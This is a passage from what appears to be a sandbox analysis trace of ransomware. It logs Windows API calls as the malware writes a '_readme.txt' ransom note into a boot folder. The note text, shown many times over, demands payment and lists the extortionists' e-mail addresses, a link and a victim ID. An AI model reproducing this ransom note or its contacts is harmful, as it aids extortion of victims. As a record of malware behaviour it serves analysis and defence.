lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.686] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0142.686] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.686] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.686] PathFindFileNameW (pszPath="") returned="" [0142.686] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.687] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.687] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.687] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.687] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0142.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.687] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0142.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.687] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.687] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.687] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.688] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.688] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.689] CloseHandle (hObject=0x6f0) returned 1 [0142.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.690] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a688b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a688b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.690] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a688b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a688b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.690] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.690] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a688b0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a688b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a688b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.690] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a688b0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a688b0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a688b0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.690] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.690] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 